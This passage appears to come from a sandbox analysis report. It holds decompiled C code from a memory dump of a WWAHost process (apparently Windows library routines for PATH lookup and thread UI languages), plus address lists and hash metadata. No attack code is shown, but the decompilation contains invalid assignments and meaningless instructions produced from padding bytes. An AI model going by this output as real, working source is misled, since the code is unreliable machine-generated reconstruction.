                                              															E0399F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                              															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                              															__edi = __edi + __eax * 2;
                                              															__edi = __edi + 2;
                                              															 *(__edi - 2) = __si;
                                              															__ebx =  *__ebx;
                                              															__eflags = __ebx - "\\WWw\\WWw";
                                              														} while (__ebx != "\\WWw\\WWw");
                                              														__esi = _v52;
                                              														__ecx = _v16;
                                              														__edx = _v32;
                                              													}
                                              													__ebx = _v56;
                                              													goto L29;
                                              												case 7:
                                              													 *0x3a48478 & 0x0000ffff = E0399F3E0(__edi,  *0x3a4847c,  *0x3a48478 & 0x0000ffff);
                                              													__eax =  *0x3a48478 & 0x0000ffff;
                                              													__eax = ( *0x3a48478 & 0x0000ffff) >> 1;
                                              													__eflags = _a8;
                                              													__edi = __edi + __eax * 2;
                                              													if(_a8 != 0) {
                                              														__ecx = __edi;
                                              														__eax = E039E39F2(__ecx);
                                              														__edi = __eax;
                                              													}
                                              													goto L28;
                                              												case 8:
                                              													__eax = 0;
                                              													 *(__edi - 2) = __ax;
                                              													 *0x3a46e58 & 0x0000ffff = E0399F3E0(__edi,  *0x3a46e5c,  *0x3a46e58 & 0x0000ffff);
                                              													 *(__esi + 0x38) = __edi;
                                              													__eax =  *0x3a46e58 & 0x0000ffff;
                                              													__eax = ( *0x3a46e58 & 0x0000ffff) >> 1;
                                              													__edi = __edi + __eax * 2;
                                              													__edi = __edi + 2;
                                              													L28:
                                              													_t301 = _v16;
                                              													_t318 = _v32;
                                              													L29:
                                              													_t288 = _t288 + 4;
                                              													__eflags = _t288;
                                              													_v56 = _t288;
                                              													goto L30;
                                              											}
                                              										}
                                              									}
                                              									goto L108;
                                              									L30:
                                              									_t301 = _t301 + 1;
                                              									_v16 = _t301;
                                              									__eflags = _t301 - _v48;
                                              								} while (_t301 < _v48);
                                              								goto L31;
                                              							}
                                              						}
                                              					}
                                              				} else {
                                              					while(1) {
                                              						L1:
                                              						_t240 =  *(_v60 + _t330 * 4);
                                              						if(_t240 > 8) {
                                              							break;
                                              						}
                                              						switch( *((intOrPtr*)(_t240 * 4 +  &M03982935))) {
                                              							case 0:
                                              								__ax =  *0x3a48488;
                                              								__eflags = __ax;
                                              								if(__ax != 0) {
                                              									__eax = __ax & 0x0000ffff;
                                              									__ebx = __ebx + 2;
                                              									__eflags = __ebx;
                                              									goto L53;
                                              								}
                                              								goto L14;
                                              							case 1:
                                              								L44:
                                              								_t318 =  &_v64;
                                              								_v80 = E03982E3E(0,  &_v64);
                                              								_t284 = _t284 + _v64 + 2;
                                              								goto L13;
                                              							case 2:
                                              								__eax =  *0x3a48480 & 0x0000ffff;
                                              								__ebx = __ebx + __eax;
                                              								__eflags = __dl;
                                              								if(__dl != 0) {
                                              									__eax = 0x3a48480;
                                              									goto L80;
                                              								}
                                              								goto L14;
                                              							case 3:
                                              								__eax = E0396EEF0(0x3a479a0);
                                              								__eax =  &_v44;
                                              								_push(__eax);
                                              								_push(0);
                                              								_push(0);
                                              								_push(4);
                                              								_push(L"PATH");
                                              								_push(0);
                                              								L57();
                                              								__esi = __eax;
                                              								_v68 = __esi;
                                              								__eflags = __esi - 0xc0000023;
                                              								if(__esi != 0xc0000023) {
                                              									L10:
                                              									__eax = E0396EB70(__ecx, 0x3a479a0);
                                              									__eflags = __esi - 0xc0000100;
                                              									if(__esi == 0xc0000100) {
                                              										_v44 = _v44 & 0x00000000;
                                              										__eax = 0;
                                              										_v68 = 0;
                                              										goto L13;
                                              									} else {
                                              										__eflags = __esi;
                                              										if(__esi < 0) {
                                              											L32:
                                              											_t214 = _v72;
                                              											__eflags = _t214;
                                              											if(_t214 != 0) {
                                              												L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
                                              											}
                                              											_t215 = _v52;
                                              											__eflags = _t215;
                                              											if(_t215 != 0) {
                                              												__eflags = _t338;
                                              												if(_t338 < 0) {
                                              													L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
                                              													_t215 = 0;
                                              												}
                                              											}
                                              											goto L36;
                                              										} else {
                                              											__eax = _v44;
                                              											__ebx = __ebx + __eax * 2;
                                              											__ebx = __ebx + 2;
                                              											__eflags = __ebx;
                                              											L13:
                                              											_t297 = _v36;
                                              											goto L14;
                                              										}
                                              									}
                                              								} else {
                                              									__eax = _v44;
                                              									__ecx =  *0x3a47b9c; // 0x0
                                              									_v44 + _v44 =  *[fs:0x30];
                                              									__ecx = __ecx + 0x180000;
                                              									__eax = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                              									_v72 = __eax;
                                              									__eflags = __eax;
                                              									if(__eax == 0) {
                                              										__eax = E0396EB70(__ecx, 0x3a479a0);
                                              										__eax = _v52;
                                              										L36:
                                              										_pop(_t331);
                                              										_pop(_t339);
                                              										__eflags = _v8 ^ _t344;
                                              										_pop(_t285);
                                              										return E0399B640(_t215, _t285, _v8 ^ _t344, _t318, _t331, _t339);
                                              									} else {
                                              										__ecx =  &_v44;
                                              										_push(__ecx);
                                              										_push(_v44);
                                              										_push(__eax);
                                              										_push(4);
                                              										_push(L"PATH");
                                              										_push(0);
                                              										L57();
                                              										__esi = __eax;
                                              										_v68 = __eax;
                                              										goto L10;
                                              									}
                                              								}
                                              								goto L108;
                                              							case 4:
                                              								__ebx = __ebx + 4;
                                              								goto L14;
                                              							case 5:
                                              								_t280 = _v56;
                                              								if(_v56 != 0) {
                                              									_t318 =  &_v36;
                                              									_t282 = E03982E3E(_t280,  &_v36);
                                              									_t297 = _v36;
                                              									_v76 = _t282;
                                              								}
                                              								if(_t297 == 0) {
                                              									goto L44;
                                              								} else {
                                              									_t284 = _t284 + 2 + _t297;
                                              								}
                                              								goto L14;
                                              							case 6:
                                              								__eax =  *0x3a45764 & 0x0000ffff;
                                              								goto L53;
                                              							case 7:
                                              								__eax =  *0x3a48478 & 0x0000ffff;
                                              								__ebx = __ebx + __eax;
                                              								__eflags = _a8;
                                              								if(_a8 != 0) {
                                              									__ebx = __ebx + 0x16;
                                              									__ebx = __ebx + __eax;
                                              								}
                                              								__eflags = __dl;
                                              								if(__dl != 0) {
                                              									__eax = 0x3a48478;
                                              									L80:
                                              									_v32 = __eax;
                                              								}
                                              								goto L14;
                                              							case 8:
                                              								__eax =  *0x3a46e58 & 0x0000ffff;
                                              								__eax = ( *0x3a46e58 & 0x0000ffff) + 2;
                                              								L53:
                                              								__ebx = __ebx + __eax;
                                              								L14:
                                              								_t330 = _t330 + 1;
                                              								if(_t330 >= _v48) {
                                              									goto L16;
                                              								} else {
                                              									_t318 = _v37;
                                              									goto L1;
                                              								}
                                              								goto L108;
                                              						}
                                              					}
                                              					L56:
                                              					asm("int 0x29");
                                              					asm("out 0x28, al");
                                              					_t242 = _t240;
                                              					_t351 = _t348 +  *((intOrPtr*)(_t337 + 0x28)) + _t242;
                                              					asm("daa");
                                              					_t289 = 0x25;
                                              					asm("pushfd");
                                              					asm("pushfd");
                                              					_t248 = _t242 +  *((intOrPtr*)(_t337 + 0x28)) +  *0x1f039826 +  *((intOrPtr*)(_t318 +  *((intOrPtr*)(_t242 +  *((intOrPtr*)(_t337 + 0x28)) +  *0x1f039826 +  &_a1530200980))));
                                              					 *((intOrPtr*)(_t248 - 0x67d77ffd)) =  *((intOrPtr*)(_t248 - 0x67d77ffd)) - _t289;
                                              					_t340 = _t337 + _t337;
                                              					asm("daa");
                                              					_t249 = _t248;
                                              					 *((intOrPtr*)(_t249 - 0x67d7b1fd)) =  *((intOrPtr*)(_t249 - 0x67d7b1fd)) - _t289 +  *_t340;
                                              					_pop(_t293);
                                              					asm("pushfd");
                                              					_t341 = _t340 +  *((intOrPtr*)(_t249 +  &_a1546912660));
                                              					asm("pushfd");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					asm("int3");
                                              					_push(0x20);
                                              					_push(0x3a2ff00);
                                              					E039AD08C(_t293, _t332, _t341);
                                              					_v44 =  *[fs:0x18];
                                              					_t333 = 0;
                                              					 *_a24 = 0;
                                              					_t294 = _a12;
                                              					__eflags = _t294;
                                              					if(_t294 == 0) {
                                              						_t253 = 0xc0000100;
                                              					} else {
                                              						_v8 = 0;
                                              						_t342 = 0xc0000100;
                                              						_v52 = 0xc0000100;
                                              						_t255 = 4;
                                              						while(1) {
                                              							_v40 = _t255;
                                              							__eflags = _t255;
                                              							if(_t255 == 0) {
                                              								break;
                                              							}
                                              							_t308 = _t255 * 0xc;
                                              							_v48 = _t308;
                                              							__eflags = _t294 -  *((intOrPtr*)(_t308 + 0x3931664));
                                              							if(__eflags <= 0) {
                                              								if(__eflags == 0) {
                                              									_t270 = E0399E5C0(_a8,  *((intOrPtr*)(_t308 + 0x3931668)), _t294);
                                              									_t351 = _t351 + 0xc;
                                              									__eflags = _t270;
                                              									if(__eflags == 0) {
                                              										_t342 = E039D51BE(_t294,  *((intOrPtr*)(_v48 + 0x393166c)), _a16, _t333, _t342, __eflags, _a20, _a24);
                                              										_v52 = _t342;
                                              										break;
                                              									} else {
                                              										_t255 = _v40;
                                              										goto L62;
                                              									}
                                              									goto L70;
                                              								} else {
                                              									L62:
                                              									_t255 = _t255 - 1;
                                              									continue;
                                              								}
                                              							}
                                              							break;
                                              						}
                                              						_v32 = _t342;
                                              						__eflags = _t342;
                                              						if(_t342 < 0) {
                                              							__eflags = _t342 - 0xc0000100;
                                              							if(_t342 == 0xc0000100) {
                                              								_t304 = _a4;
                                              								__eflags = _t304;
                                              								if(_t304 != 0) {
                                              									_v36 = _t304;
                                              									__eflags =  *_t304 - _t333;
                                              									if( *_t304 == _t333) {
                                              										_t342 = 0xc0000100;
                                              										goto L76;
                                              									} else {
                                              										_t321 =  *((intOrPtr*)(_v44 + 0x30));
                                              										_t257 =  *((intOrPtr*)(_t321 + 0x10));
                                              										__eflags =  *((intOrPtr*)(_t257 + 0x48)) - _t304;
                                              										if( *((intOrPtr*)(_t257 + 0x48)) == _t304) {
                                              											__eflags =  *(_t321 + 0x1c);
                                              											if( *(_t321 + 0x1c) == 0) {
                                              												L106:
                                              												_t342 = E03982AE4( &_v36, _a8, _t294, _a16, _a20, _a24);
                                              												_v32 = _t342;
                                              												__eflags = _t342 - 0xc0000100;
                                              												if(_t342 != 0xc0000100) {
                                              													goto L69;
                                              												} else {
                                              													_t333 = 1;
                                              													_t304 = _v36;
                                              													goto L75;
                                              												}
                                              											} else {
                                              												_t260 = E03966600( *(_t321 + 0x1c));
                                              												__eflags = _t260;
                                              												if(_t260 != 0) {
                                              													goto L106;
                                              												} else {
                                              													_t304 = _a4;
                                              													goto L75;
                                              												}
                                              											}
                                              										} else {
                                              											L75:
                                              											_t342 = E03982C50(_t304, _a8, _t294, _a16, _a20, _a24, _t333);
                                              											L76:
                                              											_v32 = _t342;
                                              											goto L69;
                                              										}
                                              									}
                                              									goto L108;
                                              								} else {
                                              									E0396EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                              									_v8 = 1;
                                              									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                              									_t342 = _a24;
                                              									_t267 = E03982AE4( &_v36, _a8, _t294, _a16, _a20, _t342);
                                              									_v32 = _t267;
                                              									__eflags = _t267 - 0xc0000100;
                                              									if(_t267 == 0xc0000100) {
                                              										_v32 = E03982C50(_v36, _a8, _t294, _a16, _a20, _t342, 1);
                                              									}
                                              									_v8 = _t333;
                                              									E03982ACB();
                                              								}
                                              							}
                                              						}
                                              						L69:
                                              						_v8 = 0xfffffffe;
                                              						_t253 = _t342;
                                              					}
                                              					L70:
                                              					return E039AD0D1(_t253);
                                              				}
                                              				L108:
                                              			}

                                              0x03982788
                                              0x0398278b
                                              0x0398278e
                                              0x0398278e
                                              0x0398278e
                                              0x03982791
                                              0x00000000
                                              0x00000000
                                              0x03982756
                                              0x03982750
                                              0x00000000
                                              0x03982794
                                              0x03982794
                                              0x03982795
                                              0x03982798
                                              0x03982798
                                              0x00000000
                                              0x03982734
                                              0x0398272c
                                              0x03982700
                                              0x039825ef
                                              0x039825ef
                                              0x039825ef
                                              0x039825f2
                                              0x039825f8
                                              0x00000000
                                              0x00000000
                                              0x039825fe
                                              0x00000000
                                              0x039828e6
                                              0x039828ec
                                              0x039828ef
                                              0x039828f5
                                              0x039828f8
                                              0x039828f8
                                              0x00000000
                                              0x039828f8
                                              0x00000000
                                              0x00000000
                                              0x03982866
                                              0x03982866
                                              0x03982876
                                              0x03982879
                                              0x00000000
                                              0x00000000
                                              0x039827e0
                                              0x039827e7
                                              0x039827e9
                                              0x039827eb
                                              0x039c5afd
                                              0x00000000
                                              0x039c5afd
                                              0x00000000
                                              0x00000000
                                              0x03982633
                                              0x03982638
                                              0x0398263b
                                              0x0398263c
                                              0x0398263e
                                              0x03982640
                                              0x03982642
                                              0x03982647
                                              0x03982649
                                              0x0398264e
                                              0x03982650
                                              0x03982653
                                              0x03982659
                                              0x039826a2
                                              0x039826a7
                                              0x039826ac
                                              0x039826b2
                                              0x039c5b11
                                              0x039c5b15
                                              0x039c5b17
                                              0x00000000
                                              0x039826b8
                                              0x039826b8
                                              0x039826ba
                                              0x039827a6
                                              0x039827a6
                                              0x039827a9
                                              0x039827ab
                                              0x039827b9
                                              0x039827b9
                                              0x039827be
                                              0x039827c1
                                              0x039827c3
                                              0x039827c5
                                              0x039827c7
                                              0x039c5c74
                                              0x039c5c79
                                              0x039c5c79
                                              0x039827c7
                                              0x00000000
                                              0x039826c0
                                              0x039826c0
                                              0x039826c3
                                              0x039826c6
                                              0x039826c6
                                              0x039826c9
                                              0x039826c9
                                              0x00000000
                                              0x039826c9
                                              0x039826ba
                                              0x0398265b
                                              0x0398265b
                                              0x0398265e
                                              0x03982667
                                              0x0398266d
                                              0x03982677
                                              0x0398267c
                                              0x0398267f
                                              0x03982681
                                              0x039c5b49
                                              0x039c5b4e
                                              0x039827cd
                                              0x039827d0
                                              0x039827d1
                                              0x039827d2
                                              0x039827d4
                                              0x039827dd
                                              0x03982687
                                              0x03982687
                                              0x0398268a
                                              0x0398268b
                                              0x0398268e
                                              0x0398268f
                                              0x03982691
                                              0x03982696
                                              0x03982698
                                              0x0398269d
                                              0x0398269f
                                              0x00000000
                                              0x0398269f
                                              0x03982681
                                              0x00000000
                                              0x00000000
                                              0x03982846
                                              0x00000000
                                              0x00000000
                                              0x03982605
                                              0x0398260a
                                              0x0398260c
                                              0x03982611
                                              0x03982616
                                              0x03982619
                                              0x03982619
                                              0x0398261e
                                              0x00000000
                                              0x03982624
                                              0x03982627
                                              0x03982627
                                              0x00000000
                                              0x00000000
                                              0x039c5b1f
                                              0x00000000
                                              0x00000000
                                              0x03982894
                                              0x0398289b
                                              0x0398289d
                                              0x039828a1
                                              0x039c5b2b
                                              0x039c5b2e
                                              0x039c5b2e
                                              0x039828a7
                                              0x039828a9
                                              0x039c5b04
                                              0x039c5b09
                                              0x039c5b09
                                              0x039c5b09
                                              0x00000000
                                              0x00000000
                                              0x039c5b35
                                              0x039c5b3c
                                              0x039828fb
                                              0x039828fb
                                              0x039826cc
                                              0x039826cc
                                              0x039826d0
                                              0x00000000
                                              0x039826d2
                                              0x039826d2
                                              0x00000000
                                              0x039826d2
                                              0x00000000
                                              0x00000000
                                              0x039825fe
                                              0x0398292d
                                              0x03982930
                                              0x03982935
                                              0x0398293b
                                              0x0398293c
                                              0x0398293e
                                              0x0398294e
                                              0x0398294f
                                              0x03982957
                                              0x03982958
                                              0x0398295a
                                              0x03982960
                                              0x03982962
                                              0x03982963
                                              0x03982966
                                              0x03982972
                                              0x03982973
                                              0x03982974
                                              0x0398297b
                                              0x0398297e
                                              0x0398297f
                                              0x03982980
                                              0x03982981
                                              0x03982982
                                              0x03982983
                                              0x03982984
                                              0x03982985
                                              0x03982986
                                              0x03982987
                                              0x03982988
                                              0x03982989
                                              0x0398298a
                                              0x0398298b
                                              0x0398298c
                                              0x0398298d
                                              0x0398298e
                                              0x0398298f
                                              0x03982990
                                              0x03982992
                                              0x03982997
                                              0x039829a3
                                              0x039829a6
                                              0x039829ab
                                              0x039829ad
                                              0x039829b0
                                              0x039829b2
                                              0x039c5c80
                                              0x039829b8
                                              0x039829b8
                                              0x039829bb
                                              0x039829c0
                                              0x039829c5
                                              0x039829c6
                                              0x039829c6
                                              0x039829c9
                                              0x039829cb
                                              0x00000000
                                              0x00000000
                                              0x039829cd
                                              0x039829d0
                                              0x039829d9
                                              0x039829db
                                              0x039829dd
                                              0x03982a7f
                                              0x03982a84
                                              0x03982a87
                                              0x03982a89
                                              0x039c5ca1
                                              0x039c5ca3
                                              0x00000000
                                              0x03982a8f
                                              0x03982a8f
                                              0x00000000
                                              0x03982a8f
                                              0x00000000
                                              0x039829e3
                                              0x039829e3
                                              0x039829e3
                                              0x00000000
                                              0x039829e3
                                              0x039829dd
                                              0x00000000
                                              0x039829db
                                              0x039829e6
                                              0x039829e9
                                              0x039829eb
                                              0x039829ed
                                              0x039829f3
                                              0x039829f5
                                              0x039829f8
                                              0x039829fa
                                              0x03982a97
                                              0x03982a9a
                                              0x03982a9d
                                              0x03982add
                                              0x00000000
                                              0x03982a9f
                                              0x03982aa2
                                              0x03982aa5
                                              0x03982aa8
                                              0x03982aab
                                              0x039c5cab
                                              0x039c5caf
                                              0x039c5cc5
                                              0x039c5cda
                                              0x039c5cdc
                                              0x039c5cdf
                                              0x039c5ce5
                                              0x00000000
                                              0x039c5ceb
                                              0x039c5ced
                                              0x039c5cee
                                              0x00000000
                                              0x039c5cee
                                              0x039c5cb1
                                              0x039c5cb4
                                              0x039c5cb9
                                              0x039c5cbb
                                              0x00000000
                                              0x039c5cbd
                                              0x039c5cbd
                                              0x00000000
                                              0x039c5cbd
                                              0x039c5cbb
                                              0x03982ab1
                                              0x03982ab1
                                              0x03982ac4
                                              0x03982ac6
                                              0x03982ac6
                                              0x00000000
                                              0x03982ac6
                                              0x03982aab
                                              0x00000000
                                              0x03982a00
                                              0x03982a09
                                              0x03982a0e
                                              0x03982a21
                                              0x03982a24
                                              0x03982a35
                                              0x03982a3a
                                              0x03982a3d
                                              0x03982a42
                                              0x03982a59
                                              0x03982a59
                                              0x03982a5c
                                              0x03982a5f
                                              0x03982a5f
                                              0x039829fa
                                              0x039829f3
                                              0x03982a64
                                              0x03982a64
                                              0x03982a6b
                                              0x03982a6b
                                              0x03982a6d
                                              0x03982a72
                                              0x03982a72
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmp
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PATH
                                              • API String ID: 0-1036084923
                                              • Opcode ID: 86100068ccd01f10f48c3ed95ab820718678cc5fd75559bea9435918c958d982
                                              • Instruction ID: 450f5dadeb57019551b37f8946cca05bfbbee7fdcc2013b15f79e4c4d8daff6b
                                              • Opcode Fuzzy Hash: 86100068ccd01f10f48c3ed95ab820718678cc5fd75559bea9435918c958d982
                                              • Instruction Fuzzy Hash: 74C19275D10219EFCB15EF99D880BBDF7B5FF88740F48482AE851AB250D735A942CB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 80%
                                              			E0398FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                              				char _v5;
                                              				signed int _v8;
                                              				signed int _v12;
                                              				char _v16;
                                              				char _v17;
                                              				char _v20;
                                              				signed int _v24;
                                              				char _v28;
                                              				char _v32;
                                              				signed int _v40;
                                              				void* __ecx;
                                              				void* __edi;
                                              				void* __ebp;
                                              				signed int _t73;
                                              				intOrPtr* _t75;
                                              				signed int _t77;
                                              				signed int _t79;
                                              				signed int _t81;
                                              				intOrPtr _t83;
                                              				intOrPtr _t85;
                                              				intOrPtr _t86;
                                              				signed int _t91;
                                              				signed int _t94;
                                              				signed int _t95;
                                              				signed int _t96;
                                              				signed int _t106;
                                              				signed int _t108;
                                              				signed int _t114;
                                              				signed int _t116;
                                              				signed int _t118;
                                              				signed int _t122;
                                              				signed int _t123;
                                              				void* _t129;
                                              				signed int _t130;
                                              				void* _t132;
                                              				intOrPtr* _t134;
                                              				signed int _t138;
                                              				signed int _t141;
                                              				signed int _t147;
                                              				intOrPtr _t153;
                                              				signed int _t154;
                                              				signed int _t155;
                                              				signed int _t170;
                                              				void* _t174;
                                              				signed int _t176;
                                              				signed int _t177;
                                              
                                              				_t129 = __ebx;
                                              				_push(_t132);
                                              				_push(__esi);
                                              				_t174 = _t132;
                                              				_t73 =  !( *( *(_t174 + 0x18)));
                                              				if(_t73 >= 0) {
                                              					L5:
                                              					return _t73;
                                              				} else {
                                              					E0396EEF0(0x3a47b60);
                                              					_t134 =  *0x3a47b84; // 0x77577b80
                                              					_t2 = _t174 + 0x24; // 0x24
                                              					_t75 = _t2;
                                              					if( *_t134 != 0x3a47b80) {
                                              						_push(3);
                                              						asm("int 0x29");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						asm("int3");
                                              						_push(0x3a47b60);
                                              						_t170 = _v8;
                                              						_v28 = 0;
                                              						_v40 = 0;
                                              						_v24 = 0;
                                              						_v17 = 0;
                                              						_v32 = 0;
                                              						__eflags = _t170 & 0xffff7cf2;
                                              						if((_t170 & 0xffff7cf2) != 0) {
                                              							L43:
                                              							_t77 = 0xc000000d;
                                              						} else {
                                              							_t79 = _t170 & 0x0000000c;
                                              							__eflags = _t79;
                                              							if(_t79 != 0) {
                                              								__eflags = _t79 - 0xc;
                                              								if(_t79 == 0xc) {
                                              									goto L43;
                                              								} else {
                                              									goto L9;
                                              								}
                                              							} else {
                                              								_t170 = _t170 | 0x00000008;
                                              								__eflags = _t170;
                                              								L9:
                                              								_t81 = _t170 & 0x00000300;
                                              								__eflags = _t81 - 0x300;
                                              								if(_t81 == 0x300) {
                                              									goto L43;
                                              								} else {
                                              									_t138 = _t170 & 0x00000001;
                                              									__eflags = _t138;
                                              									_v24 = _t138;
                                              									if(_t138 != 0) {
                                              										__eflags = _t81;
                                              										if(_t81 != 0) {
                                              											goto L43;
                                              										} else {
                                              											goto L11;
                                              										}
                                              									} else {
                                              										L11:
                                              										_push(_t129);
                                              										_t77 = E03966D90( &_v20);
                                              										_t130 = _t77;
                                              										__eflags = _t130;
                                              										if(_t130 >= 0) {
                                              											_push(_t174);
                                              											__eflags = _t170 & 0x00000301;
                                              											if((_t170 & 0x00000301) == 0) {
                                              												_t176 = _a8;
                                              												__eflags = _t176;
                                              												if(__eflags == 0) {
                                              													L64:
                                              													_t83 =  *[fs:0x18];
                                              													_t177 = 0;
                                              													__eflags =  *(_t83 + 0xfb8);
                                              													if( *(_t83 + 0xfb8) != 0) {
                                              														E039676E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                              														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                              													}
                                              													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                              													goto L15;
                                              												} else {
                                              													asm("sbb edx, edx");
                                              													_t114 = E039F8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                              													__eflags = _t114;
                                              													if(_t114 < 0) {
                                              														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                              														E0395B150();
                                              													}
                                              													_t116 = E039F6D81(_t176,  &_v16);
                                              													__eflags = _t116;
                                              													if(_t116 >= 0) {
                                              														__eflags = _v16 - 2;
                                              														if(_v16 < 2) {
                                              															L56:
                                              															_t118 = E039675CE(_v20, 5, 0);
                                              															__eflags = _t118;
                                              															if(_t118 < 0) {
                                              																L67:
                                              																_t130 = 0xc0000017;
                                              																goto L32;
                                              															} else {
                                              																__eflags = _v12;
                                              																if(_v12 == 0) {
                                              																	goto L67;
                                              																} else {
                                              																	_t153 =  *0x3a48638; // 0x0
                                              																	_t122 = L039638A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                              																	_t154 = _v12;
                                              																	_t130 = _t122;
                                              																	__eflags = _t130;
                                              																	if(_t130 >= 0) {
                                              																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                              																		__eflags = _t123;
                                              																		if(_t123 != 0) {
                                              																			_t155 = _a12;
                                              																			__eflags = _t155;
                                              																			if(_t155 != 0) {
                                              																				 *_t155 = _t123;
                                              																			}
                                              																			goto L64;
                                              																		} else {
                                              																			E039676E2(_t154);
                                              																			goto L41;
                                              																		}
                                              																	} else {
                                              																		E039676E2(_t154);
                                              																		_t177 = 0;
                                              																		goto L18;
                                              																	}
                                              																}
                                              															}
                                              														} else {
                                              															__eflags =  *_t176;
                                              															if( *_t176 != 0) {
                                              																goto L56;
                                              															} else {
                                              																__eflags =  *(_t176 + 2);
                                              																if( *(_t176 + 2) == 0) {
                                              																	goto L64;
                                              																} else {
                                              																	goto L56;
                                              																}
                                              															}
                                              														}
                                              													} else {
                                              														_t130 = 0xc000000d;
                                              														goto L32;
                                              													}
                                              												}
                                              												goto L35;
                                              											} else {
                                              												__eflags = _a8;
                                              												if(_a8 != 0) {
                                              													_t77 = 0xc000000d;
                                              												} else {
                                              													_v5 = 1;
                                              													L0398FCE3(_v20, _t170);
                                              													_t177 = 0;
                                              													__eflags = 0;
                                              													L15:
                                              													_t85 =  *[fs:0x18];
                                              													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                              													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                              														L18:
                                              														__eflags = _t130;
                                              														if(_t130 != 0) {
                                              															goto L32;
                                              														} else {
                                              															__eflags = _v5 - _t130;
                                              															if(_v5 == _t130) {
                                              																goto L32;
                                              															} else {
                                              																_t86 =  *[fs:0x18];
                                              																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                              																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                              																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                              																}
                                              																__eflags = _t177;
                                              																if(_t177 == 0) {
                                              																	L31:
                                              																	__eflags = 0;
                                              																	L039670F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                              																	goto L32;
                                              																} else {
                                              																	__eflags = _v24;
                                              																	_t91 =  *(_t177 + 0x20);
                                              																	if(_v24 != 0) {
                                              																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                              																		goto L31;
                                              																	} else {
                                              																		_t141 = _t91 & 0x00000040;
                                              																		__eflags = _t170 & 0x00000100;
                                              																		if((_t170 & 0x00000100) == 0) {
                                              																			__eflags = _t141;
                                              																			if(_t141 == 0) {
                                              																				L74:
                                              																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                              																				goto L27;
                                              																			} else {
                                              																				_t177 = E0398FD22(_t177);
                                              																				__eflags = _t177;
                                              																				if(_t177 == 0) {
                                              																					goto L42;
                                              																				} else {
                                              																					_t130 = E0398FD9B(_t177, 0, 4);
                                              																					__eflags = _t130;
                                              																					if(_t130 != 0) {
                                              																						goto L42;
                                              																					} else {
                                              																						_t68 = _t177 + 0x20;
                                              																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                              																						__eflags =  *_t68;
                                              																						_t91 =  *(_t177 + 0x20);
                                              																						goto L74;
                                              																					}
                                              																				}
                                              																			}
                                              																			goto L35;
                                              																		} else {
                                              																			__eflags = _t141;
                                              																			if(_t141 != 0) {
                                              																				_t177 = E0398FD22(_t177);
                                              																				__eflags = _t177;
                                              																				if(_t177 == 0) {
                                              																					L42:
                                              																					_t77 = 0xc0000001;
                                              																					goto L33;
                                              																				} else {
                                              																					_t130 = E0398FD9B(_t177, 0, 4);
                                              																					__eflags = _t130;
                                              																					if(_t130 != 0) {
                                              																						goto L42;
                                              																					} else {
                                              																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                              																						_t91 =  *(_t177 + 0x20);
                                              																						goto L26;
                                              																					}
                                              																				}
                                              																				goto L35;
                                              																			} else {
                                              																				L26:
                                              																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                              																				__eflags = _t94;
                                              																				L27:
                                              																				 *(_t177 + 0x20) = _t94;
                                              																				__eflags = _t170 & 0x00008000;
                                              																				if((_t170 & 0x00008000) != 0) {
                                              																					_t95 = _a12;
                                              																					__eflags = _t95;
                                              																					if(_t95 != 0) {
                                              																						_t96 =  *_t95;
                                              																						__eflags = _t96;
                                              																						if(_t96 != 0) {
                                              																							 *((short*)(_t177 + 0x22)) = 0;
